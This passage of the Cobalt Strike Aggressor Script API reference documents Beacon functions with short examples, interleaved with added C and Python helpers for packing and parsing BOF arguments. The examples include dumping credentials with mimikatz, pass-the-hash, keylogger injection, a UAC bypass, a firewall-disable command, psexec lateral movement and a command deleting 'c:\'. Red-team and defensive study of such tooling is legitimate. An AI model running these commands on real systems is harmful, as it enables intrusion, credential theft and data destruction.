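int pack_zi(char *out, int cap, const char *s, int32_t n) {
    uint32_t slen  = (uint32_t)strlen(s) + 1;   /* 'z' strings carry their NUL */
    uint32_t total = 4 + slen + 4;              /* [slen][string][int] */
    if ((uint32_t)cap < 4 + total) return -1;
    memcpy(out, &total, 4);
    memcpy(out + 4, &slen, 4);
    memcpy(out + 8, s, slen);
    memcpy(out + 8 + slen, &n, 4);
    return (int)(4 + total);
}

/* demo() exactly as written in hello.c above. */
void demo(char *args, int length) {
    datap  parser;
    char  *str_arg;
    int    num_arg;
    BeaconDataParse(&parser, args, length);
    str_arg = BeaconDataExtract(&parser, NULL);
    num_arg = BeaconDataInt(&parser);
    BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg);
}

/* Round trip used by main() and the test: pack, run demo(), return the packed size. */
int run_demo(const char *s, int n) {
    char buf[128];
    int len = pack_zi(buf, sizeof buf, s, n);
    if (len < 0) return -1;
    demo(buf, len);
    return len;
}

int main(void) {
    run_demo("Hello World", 1234);
    puts(last_beacon_output());
    return 0;
}
```

Compile it natively (no MinGW needed) and the hex dump of buf after pack_zi is the same byte sequence that the hello.cna alias hands to beacon_inline_execute; the bounds checks in BeaconDataExtract and BeaconDataInt are what keep a malformed buffer from being read past its end.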

beacon_link

This function links to an SMB or TCP listener. If the specified listener is not an SMB or TCP listener, this function does nothing.

Arguments

$1 - the id of the beacon to link through

$2 - the target host to link to. Use $null for localhost.

$3 - the listener to link

Example

# smartlink [target] [listener name]
alias smartlink {
   beacon_link($1, $2, $3);
}

beacon_remote_exec_method_describe

Describe a Beacon remote execute method

Returns

A string description of the Beacon remote execute method.

Arguments

$1 - the method

Example

println(beacon_remote_exec_method_describe("wmi"));

See also

&beacon_remote_exec_method_register, &beacon_remote_exec_methods, &bremote_exec

beacon_remote_exec_method_register

Register a Beacon remote execute method with Cobalt Strike. This adds an option for use with the remote-exec command.

Arguments

$1 - the method short name

$2 - a description of the method

$3 - the function that implements the method ($1 is the Beacon ID, $2 is the target, $3 is the command+args)

See Also

&beacon_remote_exec_method_describe, &beacon_remote_exec_methods, &bremote_exec

beacon_remote_exec_methods

Get a list of remote execute methods registered with Cobalt Strike.

Returns

An array of remote execute method names.

Example

printAll(beacon_remote_exec_methods());

See also

&beacon_remote_exec_method_describe, &beacon_remote_exec_method_register, &bremote_exec

beacon_remote_exploit_arch

Get the arch info for this Beacon lateral movement option.

Arguments

$1 - the exploit

Returns

x86 or x64

Example

println(beacon_remote_exploit_arch("psexec"));

See Also

&beacon_remote_exploit_register, &beacon_remote_exploits, &bjump

beacon_remote_exploit_describe

Describe a Beacon lateral movement option.

Returns

A string description of the Beacon lateral movement option.

Arguments

$1 - the exploit

Example

println(beacon_remote_exploit_describe("psexec"));

See Also

&beacon_remote_exploit_register, &beacon_remote_exploits, &bjump

beacon_remote_exploit_register

Register a Beacon lateral movement option with Cobalt Strike. This function extends the jump command.

Arguments

$1 - the exploit short name

$2 - the arch associated with this attack (e.g., x86, x64)

$3 - a description of the exploit

$4 - the function that implements the exploit ($1 is the Beacon ID, $2 is the target, $3 is the listener)

See also

&beacon_remote_exploit_describe, &beacon_remote_exploits, &bjump

beacon_remote_exploits

Get a list of lateral movement options registered with Cobalt Strike.

Returns

An array of lateral movement option names.

Example

printAll(beacon_remote_exploits());

See also

&beacon_remote_exploit_describe, &beacon_remote_exploit_register, &bjump

beacon_remove

Remove a Beacon from the display.

Arguments

$1 - the id for the beacon to remove

beacon_stage_pipe

This function handles the staging process for a bind pipe stager. This is an optional stager for lateral movement. You can stage any x86 payload/listener through this stager. Use &stager_bind_pipe to generate this stager.

Arguments

$1 - the id of the beacon to stage through

$2 - the target host

$3 - the listener name

$4 - the architecture of the payload to stage. x86 is the only option right now.

Example

# step 1. generate our stager
$stager = stager_bind_pipe("my listener");

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");

beacon_stage_tcp

This function handles the staging process for a bind TCP stager. This is the preferred stager for localhost-only staging. You can stage any payload/listener through this stager. Use &stager_bind_tcp to generate this stager.

Arguments

$1 - the id of the beacon to stage through

$2 - reserved; use $null for now.

$3 - the port to stage to

$4 - the listener name

$5 - the architecture of the payload to stage (x86, x64)

Example

# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");

beacons

Get information about all Beacons calling back to this Cobalt Strike team server.

Returns

An array of dictionary objects with information about each beacon.

Example

foreach $beacon (beacons()) {
   println("Bid: " . $beacon['id'] . " is " . $beacon['name']);
}

belevate

Ask Beacon to spawn an elevated session with a registered technique.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the exploit to fire

$3 - the listener to target.

Example

item "&Elevate 31337" {
   openPayloadHelper(lambda({
      binput($bids, "elevate ms14-058 $1");
      belevate($bids, "ms14-058", $1);
   }, $bids => $1));
}

See also

&beacon_exploit_describe, &beacon_exploit_register, &beacon_exploits

belevate_command

Ask Beacon to run a command in a high-integrity context

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the module/command elevator to use

$3 - the command and its arguments.

Example

# disable the firewall
alias shieldsdn {
   belevate_command($1, "uac-token-duplication", "cmd.exe /C netsh advfirewall set allprofiles state off");
}

See also

&beacon_elevator_describe, &beacon_elevator_register, &beacon_elevators

berror

Publish an error message to the Beacon transcript

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias donotrun {
   berror($1, "You should never run this command!");
}

bexecute

Ask Beacon to execute a command [without a shell]. This provides no output to the user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Example

bexecute($1, "notepad.exe");

bexecute_assembly

Spawns a local .NET executable assembly as a Beacon post-exploitation job.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the .NET executable assembly

$3 - parameters to pass to the assembly

Notes

  • This command accepts a valid .NET executable and calls its entry point.
  • This post-exploitation job inherits Beacon's thread token.
  • Compile your custom .NET programs with a .NET 3.5 compiler for compatibility with systems that don't have .NET 4.0 and later.

Example

alias myutil {
   bexecute_assembly($1, script_resource("myutil.exe"), "arg1 arg2 \"arg 3\"");
}

bexit

Ask a Beacon to exit.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Die" {
   binput($1, "exit");
   bexit($1);
}

bgetprivs

Attempts to enable the specified privilege in your Beacon session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - a comma-separated list of privileges to enable. See:

https://msdn.microsoft.com/en-us/library/windows/desktop/bb530716(v=vs.85).aspx

Example

alias debug {
   bgetprivs($1, "SeDebugPriv");
}

bgetsystem

Ask Beacon to attempt to get the SYSTEM token.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "Get &SYSTEM" {
   binput($1, "getsystem");
   bgetsystem($1);
}

bgetuid

Ask Beacon to print the User ID of the current token

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bgetuid($1);

bhashdump

Ask Beacon to dump local account password hashes. If injecting into an existing PID, that process requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the hashdump dll into.

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process
item "Dump &Hashes" {
   binput($1, "hashdump");
   bhashdump($1);
}
Inject into the specified process
bhashdump($1, 1234, "x64");

bind

Bind a keyboard shortcut to an Aggressor Script function. This is an alternate to the bind keyword.

Arguments

$1 - the keyboard shortcut

$2 - a callback function. Called when the event happens.

Example

# bind Ctrl+Left and Ctrl+Right to cycle through previous and next tab.

bind("Ctrl+Left", {
   previousTab();
});

bind("Ctrl+Right", {
   nextTab();
});

See also

&unbind

binfo

Get information from a Beacon session's metadata.

Arguments

$1 - the id for the beacon to pull metadata for

$2 - the key to extract

Returns

A string with the requested information.

Example

println("User is: " . binfo("1234", "user"));
println("PID  is: " . binfo("1234", "pid"));

binject

Ask Beacon to inject a session into a specific process

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to inject the session into

$3 - the listener to target.

$4 - the process architecture (x86 | x64)

Example

binject($1, 1234, "my listener", "x64");

binline_execute

Execute a Beacon Object File. This is the same as using the inline-execute command in Beacon.

Arguments

$1 - the id for the Beacon

$2 - the path to the BOF file

$3 - the string argument to pass to the BOF file

Notes

This function follows the behavior of *inline-execute* in the Beacon console. The string argument will be zero-terminated, converted to the target encoding, and passed as an argument to the BOF's go function. To execute a BOF with more control, use &beacon_inline_execute.

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

binput

Report that a command was run to the Beacon console and logs. Scripts that execute commands for the user (e.g., events, popup menus) should use this function to ensure operator attribution of automated actions in Beacon's logs.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

# indicate the user ran the ls command
binput($1, "ls");

bipconfig

Task a Beacon to list network interfaces.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - callback function with the ipconfig results. Arguments to the callback are: $1 = beacon ID, $2 = results

Example

alias ipconfig {
   bipconfig($1, {
      blog($1, "Network information is:\n $+ $2");
   });
}

bjobkill

Ask Beacon to kill a running post-exploitation job

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the job ID.

Example

bjobkill($1, 0);

bjobs

Ask Beacon to list running post-exploitation jobs.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bjobs($1);

bjump

Ask Beacon to spawn a session on a remote target.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the technique to use

$3 - the remote target

$4 - the listener to spawn

Example

# winrm [target] [listener]
alias winrm {
   bjump($1, "winrm", $2, $3);
}

See also

&beacon_remote_exploit_describe, &beacon_remote_exploit_register, &beacon_remote_exploits

bkerberos_ccache_use

Ask Beacon to inject a UNIX kerberos ccache file into the user's kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the ccache file

Example

alias kerberos_ccache_use {
   bkerberos_ccache_use($1, $2);
}

bkerberos_ticket_purge

Ask Beacon to purge tickets from the user's kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias kerberos_ticket_purge {
   bkerberos_ticket_purge($1);
}

bkerberos_ticket_use

Ask Beacon to inject a mimikatz kirbi file into the user's kerberos tray

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the kirbi file

Example

alias kerberos_ticket_use {
   bkerberos_ticket_use($1, $2);
}

bkeylogger

Injects a keystroke logger into a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the keystroke logger into.

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process
bkeylogger($1);
Inject into the specified process
bkeylogger($1, 1234, "x64");

bkill

Ask Beacon to kill a process

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to kill

Example

bkill($1, 1234);

blink

Ask Beacon to link to a host over a named pipe

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to link to

$3 - [optional] the pipename to use. If omitted, the default pipename from the Malleable C2 profile is used.

Note

Use &beacon_link if you want a script function that will connect or link based on a listener configuration.

Example

blink($1, "DC");

blog

Post a message to WordPress.com (just kidding). Publishes an output message to the Beacon transcript.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias demo {
   blog($1, "I am output for the blog function");
}

blog2

Publishes an output message to the Beacon transcript. This function has an alternate format from &blog

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias demo2 {
   blog2($1, "I am output for the blog2 function");
}

bloginuser

Ask Beacon to create a token from the specified credentials. This is the make_token command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password

Example

# make a token for a user with an empty password
alias make_token_empty {
   local('$domain $user');
   ($domain, $user) = split("\\\\", $2);
   bloginuser($1, $domain, $user, "");
}

blogonpasswords

Ask Beacon to dump in-memory credentials with mimikatz. This function requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the logonpasswords command into or $null

$3 - the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
item "Dump &Passwords" {
   binput($1, "logonpasswords");
   blogonpasswords($1);
}
Inject into the specified process
beacon_command_register(
   "logonpasswords_inject",
   "Inject into a process and dump in-memory credentials with mimikatz",
   "Usage: logonpasswords_inject [pid] [arch]");

alias logonpasswords_inject {
   blogonpasswords($1, $2, $3);
}

bls

Task a Beacon to list files

Variations

bls($1, "folder");

Output the results to the Beacon console.

bls($1, "folder", &callback);

Route results to the specified callback function.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to list files for. Use . for the current folder.

$3 - an optional callback function with the ls results. Arguments to the callback are: $1 = beacon ID, $2 = the folder, $3 = results

Example

on beacon_initial {
   bls($1, ".");
}

bmimikatz

Ask Beacon to run a mimikatz command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run. Supports the semicolon ( ; ) character to separate multiple commands

$3 - the PID to inject the mimikatz command into or $null

$4 - the architecture of the target PID (x86|x64) or $null

Examples

# Usage: coffee [pid] [arch]
alias coffee {
   if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
      bmimikatz($1, "standard::coffee", $2, $3);
   } else {
      bmimikatz($1, "standard::coffee");
   }
}
alias double_espresso {
   bmimikatz($1, "standard::coffee;standard::coffee");
}

bmimikatz_small

Use Cobalt Strike's "smaller" internal build of Mimikatz to execute a mimikatz command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run. Supports the semicolon ( ; ) character to separate multiple commands

$3 - the PID to inject the mimikatz command into or $null

$4 - the architecture of the target PID (x86|x64) or $null

Note

This mimikatz build supports:

* kerberos::golden
* lsadump::dcsync
* sekurlsa::logonpasswords
* sekurlsa::pth

All of the other stuff is removed for size. Use &bmimikatz if you want to bring the full ULTIMATE power of mimikatz to bear on some other offense problem.

Example

# Usage: logonpasswords_elevate [pid] [arch]
alias logonpasswords_elevate {
   if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
      bmimikatz_small($1, "!sekurlsa::logonpasswords", $2, $3);
   } else {
      bmimikatz_small($1, "!sekurlsa::logonpasswords");
   }
}

bmkdir

Ask Beacon to make a directory

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to create

Example

bmkdir($1, "you are owned");

bmode

Change the data channel for a DNS Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the data channel (e.g., dns, dns6, or dns-txt)

Example

item "Mode DNS-TXT" {
   binput($1, "mode dns-txt");
   bmode($1, "dns-txt");
}

bmv

Ask Beacon to move a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to move

$3 - the destination

Example

bmv($1, "evil.exe", "\\\\target\\C$\\evil.exe");

bnet

Run a command from Beacon's network and host enumeration tool.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to run.

Type                Description
computers           lists hosts in a domain (groups)
dclist              lists domain controllers
domain              show the current domain
domain_controllers  list domain controller hosts in a domain (groups)
domain_trusts       lists domain trusts
group               lists groups and users in groups
localgroup          lists local groups and users in local groups
logons              lists users logged onto a host
sessions            lists sessions on a host
share               lists shares on a host
user                lists users and user information
time                show time for a host
view                lists hosts in a domain (browser service)

$3 - the target to run this command against or $null

$4 - the parameter to this command (e.g., a group name)

$5 - the PID to inject the network and host enumeration tool into or $null

$6 - the architecture of the target PID (x86|x64) or $null

Notes

  • The domain command executes a BOF using inline-execute and will not spawn or inject into a process.
  • To spawn a temporary process to inject into, do not specify the $5 (PID) and $6 (arch) arguments.
  • To inject into a specific process, specify the $5 (PID) and $6 (arch) arguments.

Example

Spawn a temporary process
# ladmins [target]
# find the local admins for a target
alias ladmins {
   bnet($1, "localgroup", $2, "administrators");
}
Inject into the specified process
# ladmins [pid] [arch] [target]
# find the local admins for a target
alias ladmins {
   bnet($1, "localgroup", $4, "administrators", $2, $3);
}

bnote

Assign a note to the specified Beacon.

Arguments

$1 - the id for the beacon to post to

$2 - the note content

Example

bnote($1, "foo");

bof_extract

This function extracts the executable code from the beacon object file.

Arguments

$1 - A string containing the beacon object file

Example

# read a BOF from the script's folder and return its executable code
sub load_bof {
   local('$handle $data');
   $handle = openf(script_resource("/object_file"));
   $data   = readb($handle, -1);
   closef($handle);

   return bof_extract($data);
}

bof_pack

Pack arguments in a way that's suitable for BOF APIs to unpack.

Arguments

$1 - the id for the Beacon (needed for unicode conversions)

$2 - format string for the packed data

... - one argument per item in our format string

Note

This function packs its arguments into a binary structure for use with &beacon_inline_execute. The format string options here correspond to the BeaconData* C API available to BOF files. This API handles transformations on the data and hints as required by each type it can pack.

Type  Description                        Unpack With (C)
b     binary data                        BeaconDataExtract
i     4-byte integer                     BeaconDataInt
s     2-byte short integer               BeaconDataShort
z     zero-terminated+encoded string     BeaconDataExtract
Z     zero-terminated wide-char string   (wchar_t *)BeaconDataExtract

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

See also

&beacon_inline_execute
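As an added reference codec for the format table above (written for this page in Python; it is not Cobalt Strike's code), bof_pack below mirrors the Aggressor function's layout and bof_unpack mirrors the BeaconDataInt, BeaconDataShort and BeaconDataExtract readers that a BOF calls, so an analyst decoding BOF arguments from captured tasking can state and check the layout explicitly. The wire layout (a 4-byte little-endian body length ahead of the fields, little-endian integers, and a 4-byte length prefix on b, z and Z items) is an assumption drawn from how the C readers consume the data, not something this page states; the encoding argument stands in for the target encoding that the real function derives from the Beacon ID.

```python
import struct


def bof_pack(fmt: str, *args, encoding: str = "utf-8") -> bytes:
    """Pack arguments following the bof_pack format table.

    Layout assumption: a 4-byte little-endian body length, then one field per
    format character; i/s are raw little-endian integers, b/z/Z are a 4-byte
    length followed by the bytes (z keeps its NUL, Z its 2-byte NUL).
    """
    if len(fmt) != len(args):
        raise ValueError("exactly one argument per format character")
    body = bytearray()
    for spec, value in zip(fmt, args):
        if spec == "i":
            body += struct.pack("<i", int(value))
        elif spec == "s":
            body += struct.pack("<h", int(value))
        elif spec == "b":
            data = bytes(value)
            body += struct.pack("<I", len(data)) + data
        elif spec == "z":
            # the real function converts to the Beacon host's encoding; utf-8 is a stand-in
            data = str(value).encode(encoding) + b"\x00"
            body += struct.pack("<I", len(data)) + data
        elif spec == "Z":
            data = str(value).encode("utf-16-le") + b"\x00\x00"
            body += struct.pack("<I", len(data)) + data
        else:
            raise ValueError(f"unknown format character {spec!r}")
    return struct.pack("<I", len(body)) + bytes(body)


class BeaconDataParser:
    """Cursor over a packed blob, mirroring BeaconDataParse/Int/Short/Extract."""

    def __init__(self, blob: bytes):
        if len(blob) < 4:
            raise ValueError("blob shorter than its 4-byte length header")
        (size,) = struct.unpack_from("<I", blob, 0)
        if size != len(blob) - 4:
            raise ValueError(f"length header {size} does not match body {len(blob) - 4}")
        self.buf = blob[4:]
        self.pos = 0

    def _take(self, n: int) -> bytes:
        # bounds check that the C readers do not perform for you
        if self.pos + n > len(self.buf):
            raise ValueError("truncated field")
        chunk = self.buf[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def data_int(self) -> int:
        return struct.unpack("<i", self._take(4))[0]

    def data_short(self) -> int:
        return struct.unpack("<h", self._take(2))[0]

    def data_extract(self) -> bytes:
        (n,) = struct.unpack("<I", self._take(4))
        return self._take(n)

    def finished(self) -> bool:
        return self.pos == len(self.buf)


def bof_unpack(fmt: str, blob: bytes, encoding: str = "utf-8") -> list:
    """Decode a blob produced by bof_pack back into Python values."""
    p = BeaconDataParser(blob)
    out = []
    for spec in fmt:
        if spec == "i":
            out.append(p.data_int())
        elif spec == "s":
            out.append(p.data_short())
        elif spec == "b":
            out.append(p.data_extract())
        elif spec == "z":
            raw = p.data_extract()
            if not raw.endswith(b"\x00"):
                raise ValueError("z string is not NUL-terminated")
            out.append(raw[:-1].decode(encoding))
        elif spec == "Z":
            raw = p.data_extract()
            if len(raw) < 2 or not raw.endswith(b"\x00\x00"):
                raise ValueError("Z string is not NUL-terminated")
            out.append(raw[:-2].decode("utf-16-le"))
        else:
            raise ValueError(f"unknown format character {spec!r}")
    if not p.finished():
        raise ValueError("trailing bytes after last field")
    return out


def is_well_formed(fmt: str, blob: bytes) -> bool:
    """True when blob decodes cleanly under fmt with no leftover or short fields."""
    try:
        bof_unpack(fmt, blob)
        return True
    except (ValueError, UnicodeDecodeError):
        return False
```

The checks in bof_unpack (length header, truncated fields, missing NUL terminators, trailing bytes) are exactly the ones a BOF's own argument handling does not get from the C API, which trusts the embedded length fields; a BOF author validating its inputs has to add them on the C side.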

bpassthehash

Ask Beacon to create a token that passes the specified hash. This is the pth command in Beacon. It uses mimikatz. This function requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password hash

$5 - the PID to inject the pth command into or $null

$6 - the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
bpassthehash($1, "CORP", "Administrator", "<ntlm hash>");
Inject into the specified process
bpassthehash($1, "CORP", "Administrator", "<ntlm hash>", 1234, "x64");

bpause

Ask Beacon to pause its execution. This is a one-off sleep.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - how long the Beacon should pause execution for (milliseconds)

Example

alias pause {
   bpause($1, int($2));
}

bportscan

Ask Beacon to run its port scanner.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the targets to scan (e.g., 192.168.12.0/24)

$3 - the ports to scan (e.g., 1-1024,6667)

$4 - the discovery method to use (arp|icmp|none)

$5 - the max number of sockets to use (e.g., 1024)

$6 - the PID to inject the port scanner into or $null

$7 - the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024);
Inject into the specified process
bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024, 1234, "x64");

bpowerpick

Spawn a process, inject Unmanaged PowerShell, and run the specified command.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the cmdlet and arguments

$3 - [optional] if specified, powershell-import script is ignored and this argument is treated as the download cradle to prepend to the command. Empty string is OK here too, for no download cradle.

Example

# get the version of PowerShell available via Unmanaged PowerShell
alias powerver {
   bpowerpick($1, '$PSVersionTable.PSVersion');
}

bpowershell

Ask Beacon to run a PowerShell cmdlet

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the cmdlet and arguments

$3 - [optional] if specified, powershell-import script is ignored and this argument is treated as the download cradle to prepend to the command. Empty string is OK here too, for no download cradle.

Example

# get the version of PowerShell...
alias powerver {
   bpowershell($1, '$PSVersionTable.PSVersion');
}

bpowershell_import

Import a PowerShell script into a Beacon

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the local file to import

Example

# quickly run PowerUp
alias powerup {
   bpowershell_import($1, script_resource("PowerUp.ps1"));
   bpowershell($1, "Invoke-AllChecks");
}

bpowershell_import_clear

Clear the imported PowerShell script from a Beacon session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias powershell-clear {
   bpowershell_import_clear($1);
}

bppid

Set a parent process for Beacon's child processes

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the parent process ID. Specify 0 to reset to default behavior.

Notes

  • The current session must have rights to access the specified parent process.
  • Attempts to spawn post-ex jobs under parent processes in another desktop session may fail. This limitation is due to how Beacon launches its "temporary" processes for post-exploitation jobs and injects code into them.

Example

# getexplorerpid($bid, &callback);
sub getexplorerpid {
   bps($1, lambda({
      local('$pid $name $entry');
      foreach $entry (split("\n", $2)) {
         ($name, $null, $pid) = split("\\s+", $entry);
         if ($name eq "explorer.exe") {
            [$callback: $1, $pid];
         }
      }
   }, $callback => $2));
}

alias prepenv {
   btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
   getexplorerpid($1, {
      bppid($1, $2);
   });
}

bprintscreen

Ask Beacon to take a screenshot via PrintScr method.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the screenshot tool via PrintScr method

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process
item "&Printscreen" {
   binput($1, "printscreen");
   bprintscreen($1);
}
Inject into the specified process
bprintscreen($1, 1234, "x64");

bps

Task a Beacon to list processes

Variations

bps($1);

Output the results to the Beacon console.

bps($1, &callback);

Route results to the specified callback function.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - an optional callback function with the ps results. Arguments to the callback are: $1 = beacon ID, $2 = results

Example

on beacon_initial {
   bps($1);
}

bpsexec

Ask Beacon to spawn a payload on a remote host. This function generates an Artifact Kit executable, copies it to the target, and creates a service to run it. Clean up is included too.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to spawn a payload onto

$3 - the listener to spawn

$4 - the share to copy the executable to

$5 - the architecture of the payload to generate/deliver (x86 or x64)

Example

brev2self($1);
bloginuser($1, "CORP", "Administrator", "toor");
bpsexec($1, "172.16.48.3", "my listener", "ADMIN\$", "x64");

bpsexec_command

Ask Beacon to run a command on a remote host. This function creates a service on the remote host, starts it, and cleans it up.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to run the command on

$3 - the name of the service to create

$4 - the command to run.

Example

# disable the firewall on a remote target
# beacon> shieldsdown [target]
alias shieldsdown {
   bpsexec_command($1, $2, "shieldsdn", "cmd.exe /c netsh advfirewall set allprofiles state off");
}

bpsexec_psh

REMOVED Removed in Cobalt Strike 4.0. Use &bjump with psexec_psh option.

bpsinject

Inject Unmanaged PowerShell into a specific process and run the specified cmdlet.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to inject the session into

$3 - the process architecture (x86 | x64)

$4 - the cmdlet to run

Example

bpsinject($1, 1234, "x64", "[System.Diagnostics.Process]::GetCurrentProcess()");

bpwd

Ask Beacon to print its current working directory

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias pwd {
   bpwd($1);
}

breg_query

Ask Beacon to query a key within the registry.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the key

$3 - x86|x64 - which view of the registry to use

Example

alias typedurls {
   breg_query($1, "HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs", "x86");
}

breg_queryv

Ask Beacon to query a value within a registry key.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the path to the key

$3 - the name of the value to query

$4 - x86|x64 - which view of the registry to use

Example

alias winver {
   breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion", "ProductName", "x86");
}

bremote_exec

Ask Beacon to run a command on a remote target.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the remote execute method to use

$3 - the remote target

$4 - the command and arguments to run

Example

# winrm [target] [command+args]
alias winrm-exec {
   bremote_exec($1, "winrm", $2, $3);
}

See also

&beacon_remote_exec_method_describe, &beacon_remote_exec_method_register, &beacon_remote_exec_methods

brev2self

Ask Beacon to drop its current token. This calls the RevertToSelf() Win32 API.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias rev2self {
   brev2self($1);
}

brm

Ask Beacon to remove a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to remove

Example

# nuke the system
brm($1, "c:\\");

brportfwd

Ask Beacon to setup a reverse port forward.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to on the target

$3 - the host to forward connections to

$4 - the port to forward connections to

Example

brportfwd($1, 80, "192.168.12.88", 80);

brportfwd_local

Ask Beacon to setup a reverse port forward that routes through the current Cobalt Strike client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to on the target

$3 - the host to forward connections to

$4 - the port to forward connections to

Example

brportfwd_local($1, 80, "192.168.12.88", 80);

brportfwd_stop

Ask Beacon to stop a reverse port forward

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port bound on the target

Example

brportfwd_stop($1, 80);

brun

Ask Beacon to run a command

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Note

This capability is a simpler version of the &beacon_execute_job function. The latter function is what &bpowershell and &bshell build on. This is a (slightly) more OPSEC-safe option to run commands and receive output from them.

Example

alias w {
   brun($1, "whoami /all");
}

brunas

Ask Beacon to run a command as another user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password

$5 - the command to run

Example

brunas($1, "CORP", "Administrator", "toor", "notepad.exe");

brunasadmin

Ask Beacon to run a command in a high-integrity context (bypasses UAC).

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and its arguments.

Notes

This command uses the Token Duplication UAC bypass. This bypass has a few requirements:

  • Your user must be a local admin
  • If Always Notify is enabled, an existing high integrity process must be running in the current desktop session.

Example

# disable the firewall
brunasadmin($1, "cmd.exe /C netsh advfirewall set allprofiles state off");

brunu

Ask Beacon to run a process under another process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID of the parent process

$3 - the command + arguments to run

Example

brunu($1, 1234, "notepad.exe");

bscreenshot

Ask Beacon to take a screenshot.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the screenshot tool

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process
item "&Screenshot" {
   binput($1, "screenshot");
   bscreenshot($1);
}
Inject into the specified process
bscreenshot($1, 1234, "x64");

bscreenwatch

Ask Beacon to take periodic screenshots
